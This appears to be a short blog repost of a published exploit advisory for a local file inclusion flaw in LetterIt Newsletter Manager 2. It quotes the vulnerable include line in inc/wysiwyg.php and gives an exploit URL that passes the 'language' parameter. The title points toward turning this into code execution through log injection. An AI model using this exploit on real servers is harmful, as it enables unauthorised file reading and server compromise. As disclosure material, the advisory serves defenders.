LFI to RCE via access_log injection

LetterIt 2 - LFI


[o] LetterIt 2 Local File Inclusion Vulnerability
Software : LetterIt Newsletter Manager version 2
Vendor : http://www.letterit.de/
Author : NoGe


[o] Vulnerable file
inc/wysiwyg.php
include("../language/".$_GET['language'].".php");


[o] Exploit
http://localhost/[path]/inc/wysiwyg.php?language=[LFI]


[o] Publish
http://milw0rm.com/exploits/6179


Comments

labatterie said…
Thank you so much for the information...